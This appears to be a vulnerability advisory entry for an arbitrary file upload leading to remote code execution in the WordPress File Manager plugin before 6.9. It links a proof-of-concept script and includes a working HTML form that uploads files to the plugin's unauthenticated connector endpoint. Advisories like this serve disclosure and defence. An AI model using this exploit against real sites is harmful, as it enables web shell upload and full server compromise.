File Manager < 6.9 - Arbitrary File Upload leading to RCE

2020-09-01T00:00:00
ID WPEX-ID:10389
Type wpexploit
Reporter Ville Korhonen
Modified 2020-10-05T00:00:00

Description

WordPress Vulnerability - File Manager < 6.9 - Arbitrary File Upload leading to RCE

                                        
                                            https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

&lt;html&gt;
&lt;body&gt;
  &lt;form method="POST" enctype="multipart/form-data" action="https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"&gt;
    &lt;input type="hidden" name="cmd" value="upload"/&gt;
    &lt;input type="hidden" name="target" value="l1_Lw"/&gt;
    &lt;input type="file" name="upload[]"/&gt;&lt;br/&gt;&lt;br/&gt;
    &lt;input type="submit" value="Upload"/&gt;
  &lt;/form&gt;
&lt;/body&gt;